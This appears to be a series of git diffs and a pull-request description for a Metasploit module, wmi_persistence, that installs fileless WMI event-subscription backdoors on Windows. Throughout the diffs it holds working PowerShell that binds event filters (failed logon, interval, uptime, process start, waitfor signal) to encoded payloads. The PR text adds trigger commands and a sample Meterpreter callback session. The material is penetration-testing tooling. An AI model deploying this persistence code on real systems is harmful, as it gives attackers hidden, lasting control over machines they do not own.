@@ -141,20 +161,17 @@ class MetasploitModule < Msf::Exploit::Local
    command = build_payload
    class_name = datastore['CLASSNAME']
    process_name = datastore['PROCESS_TRIGGER']
-   "$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'}
+   <<-HEREDOC
+    $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
+   HEREDOC
   end
 
 
   def log_file(log_path = nil) # Thanks Meatballs for this
-    # Get hostname
     host = session.session_host
-
-    # Create Filename info to be appended to downloaded files
     filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
-    # Create a directory for the logs
     if log_path
       logs = ::File.join(log_path, 'logs', 'wmi_persistence',
       Rex::FileUtils.clean_path(host + filenameinfo))
@@ -162,11 +179,7 @@ class MetasploitModule < Msf::Exploit::Local
       logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',
       Rex::FileUtils.clean_path(host + filenameinfo))
     end
-
-    # Create the log directory
     ::FileUtils.mkdir_p(logs)
-
-    # logfile name
     logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')
     logfile
   end

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Local
       clean_up_rc = ""
       clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
       clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\""
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n"
       clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
       clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
       clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -217,6 +217,9 @@ class MetasploitModule < Msf::Exploit::Local
       clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
       clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
       clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\""
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
       file_local_write(clean_rc, clean_up_rc)
       print_status("Clean up Meterpreter RC file: #{clean_rc}")
     else

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -188,7 +188,7 @@ class MetasploitModule < Msf::Exploit::Local
     $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
     $filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
     $consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"}
-    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1}   
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1}
    HEREDOC
   end
 

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -91,6 +91,11 @@ class MetasploitModule < Msf::Exploit::Local
       return
    end
 
+   if is_system?
+      print_error("This module cannot run as System")
+      return
+   end
+
    host = session.session_host
    print_status('Installing Persistence...')
 

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -91,6 +91,9 @@ class MetasploitModule < Msf::Exploit::Local
       return
    end
 
+   host = session.session_host
+   print_status('Installing Persistence...')
+
    case datastore['PERSISTENCE_METHOD']
     when 'LOGON'
       psh_exec(subscription_logon)
@@ -102,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
       remove_persistence
     when 'EVENT'
       psh_exec(subscription_event)
-      print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
+      print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\#{host}\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
       remove_persistence
     when 'PROCESS'
       psh_exec(subscription_process)
@@ -110,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Local
       remove_persistence
     when 'WAITFOR'
       psh_exec(subscription_waitfor)
-      print_good "Persistence installed! Call a shell using \"waitfor.exe /S <target_ip> /SI "+datastore['WAITFOR_TRIGGER']+"\""
+      print_good "Persistence installed! Call a shell using \"waitfor.exe /S #{host} /SI "+datastore['WAITFOR_TRIGGER']+"\""
       remove_persistence
     end
    end

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -64,7 +64,10 @@ class MetasploitModule < Msf::Exploit::Local
 
 
   def exploit
-   raise "Powershell not available" if ! have_powershell?
+   unless have_powershell?
+      print_error("This module requires powershell to run")
+      return
+   end
 
    unless is_admin?
       print_error("This module requires admin privs to run")

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -1,0 +1,151 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+require 'msf/core/post/windows/powershell'
+require 'msf/core/post/file'
+
+class MetasploitModule < Msf::Exploit::Local
+
+  include Msf::Post::Windows::Powershell
+  include Msf::Exploit::Powershell
+  include Post::Windows::Priv
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'WMI Event Subscription Persistence',
+      'Description'      => %q{
+          This module will create a permanent WMI event subscription to achieve file-less persistence using one
+          of two methods. The USERNAME method will create an event filter that will query the event log for an
+          EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER.
+          When these criteria are met a command line event consumer will trigger an encoded powershell payload.
+          The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL.
+          This module requires administrator level privileges as well as a high integrity process. It is also
+          recommended not to use stageles payloads due to powershell script length limitations.
+        },
+      'Author'           => ['Nick Tyrer <@NickTyrer>'],
+      'License'          => MSF_LICENSE,
+      'Privileged'       => true,
+      'Platform'         => 'win',
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [['Windows', {}]],
+      'DefaultTarget'    => 0,
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        },
+      'References' => [
+        ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],
+        ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/']
+      ]
+    ))
+
+    register_options([
+      OptEnum.new('PERSISTENCE_METHOD',
+        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL']]),
+      OptInt.new('EVENT_ID_TRIGGER',
+        [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
+      OptString.new('USERNAME_TRIGGER',
+        [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]),
+     OptInt.new('CALLBACK_INTERVAL',
+        [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]),
+      OptString.new('CLASSNAME',
+        [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+    ])
+  end
+
+
+  def build_payload
+   cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+  end
+
+
+  def subscription_user
+   command = build_payload
+   event_id = datastore['EVENT_ID_TRIGGER']
+   username = datastore['USERNAME_TRIGGER']
+   class_name = datastore['CLASSNAME']
+
+"auditpol.exe /set /subcategory:Logon /failure:Enable
+$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent Within 5 WHERE TargetInstance ISA 'Win32_NTLogEvent' And Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
+$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+  end
+
+  def subscription_interval
+   command = build_payload
+   class_name = datastore['CLASSNAME']
+   callback_interval = datastore['CALLBACK_INTERVAL']
+
+"$timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
+$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'}
+$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+  end
+
+
+  def log_file(log_path = nil) # Thanks Meatballs for this
+    # Get hostname
+    host = session.session_host
+
+    # Create Filename info to be appended to downloaded files
+    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+    # Create a directory for the logs
+    if log_path
+      logs = ::File.join(log_path, 'logs', 'wmi_persistence',
+      Rex::FileUtils.clean_path(host + filenameinfo))
+    else
+      logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',
+      Rex::FileUtils.clean_path(host + filenameinfo))
+    end
+
+    # Create the log directory
+    ::FileUtils.mkdir_p(logs)
+
+    # logfile name
+    logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')
+    logfile
+  end
+
+
+  def cleanup
+    name_class = datastore['CLASSNAME']
+    clean_rc = log_file()
+    clean_up_rc = ""
+    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"  
+    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+    file_local_write(clean_rc, clean_up_rc)
+    print_status("Clean up Meterpreter RC file: #{clean_rc}")
+  end
+
+
+  def exploit
+   raise "Powershell not available" if ! have_powershell?
+
+   unless is_admin?
+      print_error("This module requires admin privs to run")
+      return
+   end
+
+   unless is_high_integrity?
+      print_error("This module requires UAC to be bypassed first")
+      return
+   end
+
+   case datastore['PERSISTENCE_METHOD']
+   when 'INTERVAL'      
+      psh_exec(subscription_interval)
+      print_good "Backdoor installed!"
+      @cleanup
+   when 'USERNAME'
+      psh_exec(subscription_user)
+      print_good "Backdoor installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
+      @cleanup
+    end
+   end
+end

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -19,12 +19,13 @@ class MetasploitModule < Msf::Exploit::Local
       'Name'             => 'WMI Event Subscription Persistence',
       'Description'      => %q{
           This module will create a permanent WMI event subscription to achieve file-less persistence using one
-          of three methods. The USERNAME method will create an event filter that will query the event log for an
+          of four methods. The USERNAME method will create an event filter that will query the event log for an
           EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER.
           When these criteria are met a command line event consumer will trigger an encoded powershell payload.
           The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL.
-          The LOGON method will create an event filter that will trigger the payload after the system uptime has reached
-          the specified value. This module requires administrator level privileges as well as a high integrity process.
+          The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4
+          minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is
+          started. This module requires administrator level privileges as well as a high integrity process.
           It is also recommended not to use stageless payloads due to powershell script length limitations.
         },
       'Author'           => ['Nick Tyrer <@NickTyrer>'],
@@ -47,12 +48,14 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options([
       OptEnum.new('PERSISTENCE_METHOD',
-        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL','LOGON']]),
+        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL','LOGON','PROCESS']]),
       OptInt.new('EVENT_ID_TRIGGER',
         [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
       OptString.new('USERNAME_TRIGGER',
         [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]),
-     OptInt.new('CALLBACK_INTERVAL',
+      OptString.new('PROCESS_TRIGGER',
+        [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]),
+      OptInt.new('CALLBACK_INTERVAL',
         [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]),
       OptString.new('CLASSNAME',
         [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
@@ -86,6 +89,10 @@ class MetasploitModule < Msf::Exploit::Local
       psh_exec(subscription_user)
       print_good "Backdoor installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
       @cleanup
+    when 'PROCESS'
+      psh_exec(subscription_process)
+      print_good "Backdoor installed!"
+      @cleanup
     end
    end
 
@@ -99,20 +106,8 @@ class MetasploitModule < Msf::Exploit::Local
    command = build_payload
    class_name = datastore['CLASSNAME']
    "$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
-   $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-   $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
-  end
-
-
-  def subscription_user
-   command = build_payload
-   event_id = datastore['EVENT_ID_TRIGGER']
-   username = datastore['USERNAME_TRIGGER']
-   class_name = datastore['CLASSNAME']
-   "auditpol.exe /set /subcategory:Logon /failure:Enable
-   $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
-   $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
-   $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+    $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
   end
 
 
@@ -122,6 +117,28 @@ class MetasploitModule < Msf::Exploit::Local
    callback_interval = datastore['CALLBACK_INTERVAL']
    "$timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"}
     $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'}
+    $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+  end
+
+
+  def subscription_user
+   command = build_payload
+   event_id = datastore['EVENT_ID_TRIGGER']
+   username = datastore['USERNAME_TRIGGER']
+   class_name = datastore['CLASSNAME']
+   "auditpol.exe /set /subcategory:Logon /failure:Enable
+    $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'}
+    $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
+    $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
+  end
+
+
+  def subscription_process
+   command = build_payload
+   class_name = datastore['CLASSNAME']
+   process_name = datastore['PROCESS_TRIGGER']
+   "$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'}
     $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"}
     $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}"
   end
@@ -162,5 +179,4 @@ class MetasploitModule < Msf::Exploit::Local
     file_local_write(clean_rc, clean_up_rc)
     print_status("Clean up Meterpreter RC file: #{clean_rc}")
   end
-
 end

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Local
           EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER.
           When these criteria are met a command line event consumer will trigger an encoded powershell payload.
           The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL.
-          The LOGON method will create an event filter that will trigger the payload after the system uptime has reached 
+          The LOGON method will create an event filter that will trigger the payload after the system uptime has reached
           the specified value. This module requires administrator level privileges as well as a high integrity process.
           It is also recommended not to use stageless payloads due to powershell script length limitations.
         },

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -110,7 +110,6 @@ class MetasploitModule < Msf::Exploit::Local
       remove_persistence
     when 'WAITFOR'
       psh_exec(subscription_waitfor)
-      cmd_exec("waitfor.exe", args = " #{datastore['WAITFOR_TRIGGER']}")
       print_good "Persistence installed! Call a shell using \"waitfor.exe /S <target_ip> /SI "+datastore['WAITFOR_TRIGGER']+"\""
       remove_persistence
     end
@@ -189,6 +188,7 @@ class MetasploitModule < Msf::Exploit::Local
     $filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
     $consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"}
     $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1}
+    Start-Process -FilePath waitfor.exe #{word} -NoNewWindow
    HEREDOC
   end
 

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Local
       'Platform'         => 'win',
       'SessionTypes'  => ['meterpreter'],
       'Targets'       => [['Windows', {}]],
-      'DisclosureDate' => 'June 06 2017',
+      'DisclosureDate' => 'Jun 6 2017',
       'DefaultTarget'    => 0,
       'DefaultOptions' =>
         {
@@ -117,7 +117,7 @@ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class _
     name_class = datastore['CLASSNAME']
     clean_rc = log_file()
     clean_up_rc = ""
-    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"  
+    clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
     clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
     clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
     file_local_write(clean_rc, clean_up_rc)
@@ -139,7 +139,7 @@ $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class _
    end
 
    case datastore['PERSISTENCE_METHOD']
-   when 'INTERVAL'      
+   when 'INTERVAL'
       psh_exec(subscription_interval)
       print_good "Backdoor installed!"
       @cleanup

--- a/modules/exploits/windows/local/wmi_persistence.rb
+++ b/modules/exploits/windows/local/wmi_persistence.rb
@@ -32,6 +32,7 @@ class MetasploitModule < Msf::Exploit::Local
       'Platform'         => 'win',
       'SessionTypes'  => ['meterpreter'],
       'Targets'       => [['Windows', {}]],
+      'DisclosureDate' => 'June 06 2017',
       'DefaultTarget'    => 0,
       'DefaultOptions' =>
         {


### PR DESCRIPTION
This change adds the module wmi_persistence

This module will create a permanent WMI event subscription to achieve file-less persistence using one of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon/failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method creates an event filter that utilises the microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER before executing the payload. The signal can be sent from a windows host on a LAN utilising the waitfor.exe command (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.

The module requires the session to have powershell, administrator privs and to be in an elevated state.

## Verification
### PERSISTENCE_METHOD USERNAME

- [ ] Verify target has filesharing enabled (and port 445 open)
- [ ] Verify target has failed logon auditing enabled (use `auditpol.exe /set /subcategory:Logon /failure:Enable` to enable)
- [ ] Start `msfconsole`
- [ ] Get a high integrity session
- [ ] `use exploit/windows/local/wmi_persistence`
- [ ] `set SESSION 1`
- [ ] `exploit`
- [ ] run `smbclient \\\\10.10.30.38\\C$ -U BOB pass`

### Sample Output
`msf  > use exploit/windows/local/wmi_persistence`
`msf exploit(wmi_persistence) > set session 1`
`session => 1`
`msf exploit(wmi_persistence) > exploit`
`[+]  - Bytes remaining: 12588`
`[+]  - Bytes remaining: 4588`
`[+] Payload successfully staged.`
`[+] Persistence installed! Call a shell using "smbclient \\\\<target_ip>\\C$ -U BOB <arbitrary password>"`
`[*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/10.10.30.38_20170623.0735/10.10.30.38_20170623.0735.rc`
`msf exploit(wmi_persistence) > smbclient \\\\10.10.30.38\\C$ -U BOB pass`
`[*] exec: smbclient \\\\10.10.30.38\\C$ -U BOB pass`
`WARNING: The "syslog" option is deprecated`
`session setup failed: NT_STATUS_LOGON_FAILURE`
`msf exploit(wmi_persistence) > `
`[*] Sending stage (957487 bytes) to 10.10.30.38`
`[*] Meterpreter session 2 opened (10.10.30.35:4444 -> 10.10.30.38:49287) at 2017-06-23 21:10:53 +0100`

- [ ] `sessions -i 1 -C "resource /root/.msf4/logs/wmi_persistence/10.10.30.38_20170623.0735/10.10.30.38_20170623.0735.rc"`
- [ ] On the target machine use [WmiEventHelper.exe](http://powerevents.codeplex.com/downloads/get/198928) to verify the subscriptions are created and deleted

### PERSISTENCE_METHOD INTERVAL

- [ ] `set SESSION 1`
- [ ] `set PERSISTENCE_METHOD INTERVAL`
- [ ] `exploit`
- [ ] Wait 30 mins for payload to callback.
- [ ] `sessions -i 1 -C "resource /root/.msf4/logs/wmi_persistence/10.10.30.38_20170623.0735/10.10.30.38_20170623.0735.rc"`
- [ ] On the target machine use WmiEventHelper.exe to verify the subscriptions are created and deleted

### PERSISTENCE_METHOD LOGON

- [ ] `set SESSION 1`
